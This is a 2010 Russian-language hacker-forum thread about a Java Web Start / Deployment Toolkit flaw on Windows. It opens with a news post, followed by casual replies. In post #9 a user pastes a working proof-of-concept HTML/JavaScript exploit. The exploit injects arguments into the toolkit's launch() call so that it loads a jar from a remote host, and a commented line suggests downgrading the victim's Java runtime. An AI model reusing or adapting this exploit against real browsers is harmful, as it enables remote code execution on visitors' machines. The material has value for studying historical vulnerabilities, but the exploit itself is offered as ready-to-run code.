Программная “дыра” в Java делает пользователей Windows уязвимыми перед хакерами

Discussion in 'Мировые новости. Обсуждения.' started by 3d_max, 13 Apr 2010.

  1. 3d_max

    3d_max New Member

    Joined:
    1 Feb 2010
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    Тревожные известия пришли для пользователей компьютеров под управлением операционной системы Windows. Сразу из двух источников появились сообщения об обнаружении в технологии Java новой уязвимости, которая может использоваться хакерами для атак на Windows PC. Причем, для осуществления такой атаки пользователям достаточно посетить веб-страницу с вредоносным кодом.

    Специалист Google Тавис Орманди (Tavis Ormandy) и работник компании Wintercore Рубен Сантамарта (Ruben Santamarta) независимо друг от друга опубликовали в различных источниках подробности о данной уязвимости. По их словам, проблема связана с фреймворком Java Web Start, позволяющим разработчикам легко создавать Java приложения. При этом Тавис Орманди подчеркивает, что отключение данного Java плагина отнюдь не является панацеей от хакерских атак.

    По данным специалистов, с помощью указанной уязвимости (которую, кстати, оказалось очень легко обнаружить) злоумышленник способен передавать произвольные параметры в утилиту и, в конечном счете, получать контроль над системой. В блоге Threat Post лаборатории Касперского говорится, что эта уязвимость может использоваться на всех актуальных версиях Windows, а также в популярных браузерах, включая Firefox, Internet Explorer и Chrome.

    Тавис Орманди отмечает, что он проинформировал разработчиков технологии Java Web Start из Sun Microsystems об обнаруженной проблеме. Однако ему сообщили, что в компании не считают приоритет данной уязвимости достаточно высоким, чтобы выпустить патч для нее вне стандартного квартального цикла.

    12.04.2010
    Источник
     
    #1 3d_max, 13 Apr 2010
    Last edited by a moderator: 13 Apr 2010
  2. Dreak

    Dreak Member

    Joined:
    31 Aug 2009
    Messages:
    1
    Likes Received:
    5
    Reputations:
    0
    О_о Ссылку на код в студию.
     
  3. BlackSite

    BlackSite Banned

    Joined:
    6 Feb 2009
    Messages:
    148
    Likes Received:
    100
    Reputations:
    0
    Удалаю java к чертям :) )))
     
  4. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    Windows делает пользователей Windows уязвимыми перед хакерами
     
  5. 3d_max

    3d_max New Member

    Joined:
    1 Feb 2010
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    Ссылки на код нет
     
  6. antibiotic

    antibiotic [ таблетка ]

    Joined:
    13 Jul 2009
    Messages:
    620
    Likes Received:
    520
    Reputations:
    245
    повсюду одни дыры..
    до этого новость была про 25 дыр.. в вин
     
    _________________________
  7. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    дырка в java, при чём тут windows?
     
  8. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    А они опубликуют место с дырочкой или так, попугать решили?
     
  9. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1

    HTML:
    <html>
    <head><title>Java Deployment Toolkit Test Page</title></head>
    <body>
        <script>
            // Tavis Ormandy <[email protected]>, April 2010
    
            var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
    
            if (window.navigator.appName == "Microsoft Internet Explorer") {
                var o = document.createElement("OBJECT");
    
                o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
    
                // Trigger the bug
                o.launch(u);
            } else {
                // Mozilla
                var o = document.createElement("OBJECT");
                var n = document.createElement("OBJECT");
    
                o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
                n.type = "application/java-deployment-toolkit";
                document.body.appendChild(o);
                document.body.appendChild(n);
    
                // Test both MIME types
                try {
                    // Old type
                    o.launch(u);
                } catch (e) {
                    // New type
                    n.launch(u);
                }
            }
    
            // Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
            // this classic exploit?
            // http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
    
            // o.installJRE("1.4.2_18");
        </script>
    </body>
    </html>
    
     
    #9 BlackSun, 13 Apr 2010
    Last edited: 13 Apr 2010
    1 person likes this.
  10. NewCapital

    NewCapital Banned

    Joined:
    1 Nov 2009
    Messages:
    156
    Likes Received:
    95
    Reputations:
    14
    вдуватели и сюда добрались :(
    лиж бы дыру найти
     
  11. Svara

    Svara Member

    Joined:
    12 Feb 2010
    Messages:
    6
    Likes Received:
    12
    Reputations:
    0
    Как модем поменяю, перейду на убунту. А то стоит и свой длинк настроить немогу.
     
  12. Life7

    Life7 Banned

    Joined:
    14 Jun 2009
    Messages:
    150
    Likes Received:
    54
    Reputations:
    0
    дыра снова...
     
  13. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    [​IMG]

    пипец !!! че за херню выложили на топике, что у меня антивирс так жестко реагирует на это?
    ложная тревога или "по делу" ?
     
  14. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,691
    Likes Received:
    3,145
    Reputations:
    236
    года два или три назад,
    платёжные системы наотрез отказались от Явы,
    которую использовали для идентификации клиентов.

    сочли, что запускать аппликации на компе клиента - нарушает безопасность.

    за ненадобностью хакерам - код сплойта нашёл путь в массы кракеров.
     
  15. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    java...
    хмм. читал книгу на eng и там написано было, что один из неуязвимым считается java и php. , и что и них нельзя вызывать переполнение буфера..
    херня какая то.
     
Loading...